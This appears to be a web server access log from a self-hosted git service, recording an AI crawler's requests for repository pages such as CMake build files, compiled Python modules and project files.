"https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11095] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:03:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11098] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11097] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:03:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11101] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:03:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11059] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 9987] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 11372] [Gzip 4.45] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" [Client 74.7.227.38] [Length 552] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/src-old/old_log_macros.hpp" +[17/Feb/2026:17:03:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11057] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11056] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11102] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:03:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks?display=rendered" [Client 74.7.227.38] [Length 11103] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeFiles/progress.marks" +[17/Feb/2026:17:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache?display=rendered" [Client 74.7.227.38] [Length 11055] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/cmake.check_cache" +[17/Feb/2026:17:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake?display=rendered" [Client 74.7.227.38] [Length 11094] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/CMakeFiles/Makefile.cmake" +[17/Feb/2026:17:03:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/update_status.py?display=source" [Client 74.7.227.38] [Length 13178] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/update_status.py" +[17/Feb/2026:17:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 26360] [Gzip 11.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply" +[17/Feb/2026:17:03:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/blame/branch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:03:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_diffpatch/main/OpcUaMinimal/obj/OpcUaMinimal.csproj.nuget.dgspec.json" +[17/Feb/2026:17:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12?display=source" [Client 74.7.227.38] [Length 11083] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/python3.12" +[17/Feb/2026:17:03:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj?display=rendered" [Client 74.7.227.38] [Length 11132] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcUaMinimal/OpcUaMinimal.csproj" +[17/Feb/2026:17:03:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt?display=rendered" [Client 74.7.227.38] [Length 11123] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/requirements.txt" +[17/Feb/2026:17:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" [Client 74.7.227.38] [Length 72043] [Gzip 33.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/main.cpp.o" +[17/Feb/2026:17:03:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" [Client 74.7.227.38] [Length 22400] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/.cmake/api/v1/reply/cmakeFiles-v1-7000d9a775bb6a27302a.json" +[17/Feb/2026:17:03:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10934] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10961] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10962] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc?display=rendered" [Client 74.7.227.38] [Length 10960] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldMonitor/build/GoldMonitor_V5.1/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:03:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10963] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldMonitor/build/GoldMonitor_V5.3/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:03:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/GoldMonitor_V5.2/localpycs/pyimod01_archive.pyc?display=rendered" [Client 74.7.227.38] [Length 10935] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like 